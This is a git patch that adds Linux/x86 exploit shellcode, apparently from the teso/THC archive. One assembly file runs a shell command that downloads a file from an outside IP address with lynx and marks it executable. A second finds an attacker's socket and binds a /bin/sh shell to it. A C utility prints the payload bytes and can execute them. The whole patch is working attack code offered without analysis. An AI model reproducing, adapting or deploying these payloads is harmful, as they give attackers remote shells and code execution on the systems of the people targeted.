From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/tsig/shellcode/execve-shellcode.s | 49 ++++++++++++++++++++ other/tsig/shellcode/peername.s | 79 +++++++++++++++++++++++++++++++++ other/tsig/shellcode/shellcode.c | 48 ++++++++++++++++++++ 3 files changed, 176 insertions(+) create mode 100644 other/tsig/shellcode/execve-shellcode.s create mode 100644 other/tsig/shellcode/peername.s create mode 100644 other/tsig/shellcode/shellcode.c (limited to 'other/tsig/shellcode') diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s new file mode 100644 index 0000000..25015cf --- /dev/null +++ b/other/tsig/shellcode/execve-shellcode.s @@ -0,0 +1,49 @@ +/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */ + +.data +.globl cbegin +.globl cend + +cbegin: + + jmp jahead + +docall: + pop %edi + + xorl %eax, %eax /* read number of arguments */ + push %eax + movb (%edi), %al + inc %edi + +decl1: push %edi +decl2: scasb /* search delim bytes */ + jnz decl2 + + movb %ah, -1(%edi) + dec %eax + jnz decl1 + + pop %ebx /* pathname */ + push %ebx + + push %eax + pop %edx /* esp -= 4, edx = &envp[] = NULL */ + movl %esp, %ecx /* ecx = &argv[] */ + + movb $11, %al + int $0x80 + +jahead: call docall + +/* reverse order arguments */ +.byte 0x03 /* number of arguments */ +.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a" +.byte 0x03 +.ascii "-c" +.byte 0x02 +.ascii "/bin/sh" +.byte 0x01 + +cend: + diff --git a/other/tsig/shellcode/peername.s b/other/tsig/shellcode/peername.s new file mode 100644 index 0000000..61cab0a --- /dev/null +++ b/other/tsig/shellcode/peername.s @@ -0,0 +1,79 @@ +.globl cbegin +.globl cend + +cbegin: + xor %ebx,%ebx + mov $0x7,%bl + mov %esp,%edx + jmp label1 + stos %al,%es:(%edi) + stos %al,%es:(%edi) + stos %al,%es:(%edi) + stos %al,%es:(%edi) + stos %al,%es:(%edi) + stos %al,%es:(%edi) + stos %al,%es:(%edi) + stos %al,%es:(%edi) + stos %al,%es:(%edi) + +label1: + push $0x10 + mov %esp,%ecx + push %ecx + push %edx + push $0xfe + mov %esp,%ecx +label2: + xor %eax,%eax + mov $0x66,%al + int $0x80 + test $0xff,%al + jne label3 + cmpw $0x5234,0x12(%esp,1) + je label4 +label3: + pop %edx + test $0xff,%dl + je label7 + dec %dl + push %edx + jmp label2 +.ascii "\x38" +label4: + pop %ebx + xor %ecx,%ecx + mov $0x3,%cl +label5: + dec %cl + xor %eax,%eax + mov $0x3f,%al + int $0x80 + jcxz label6 + jmp label5 +label6: + push $0x4 + push $0x0 + push $18 + push $1 + push %ebx + movl $102, %eax + movl $14, %ebx + movl %esp, %ecx + int $0x80 + push $0x0 + push $0x0 + push $0x68732f + push $0x6e69622f + lea 0x8(%esp,1),%ecx + lea 0xc(%esp,1),%edx + mov %esp,(%ecx) + mov %esp,%ebx + xor %eax,%eax + mov $0xb,%al + int $0x80 +label7: + xor %eax,%eax + inc %al + int $0x80 +cend: + diff --git a/other/tsig/shellcode/shellcode.c b/other/tsig/shellcode/shellcode.c new file mode 100644 index 0000000..0239f12 --- /dev/null +++ b/other/tsig/shellcode/shellcode.c @@ -0,0 +1,48 @@ +/* shellcode extraction utility, + * by typo / teso, small mods by scut. + */ + + +#include +#include +#include + +extern void cbegin (); +extern void cend (); + + +int +main (int argc, char *argv[]) +{ + int i; + unsigned char * buf = (unsigned char *) cbegin; + unsigned char ex_buf[1024]; + + + printf ("/* %d byte shellcode */\n", cend - cbegin); + printf ("\""); + for (i = 0 ; buf < (unsigned char *) cend; ++buf) { + + printf ("\\x%02x", *buf & 0xff); + + if (++i >= 12) { + i = 0; + printf ("\"\n\""); + } + } + printf ("\";\n"); + + printf("\n"); + + if (argc > 1) { + printf ("%02x\n", ((unsigned char *) cbegin)[0]); + printf ("%02x\n", ex_buf[0]); + memcpy (ex_buf, cbegin, cend - cbegin); + printf ("%02x\n", ex_buf[0]); + + ((void (*)()) &ex_buf)(); + } + + exit (EXIT_SUCCESS); +} + -- cgit v1.3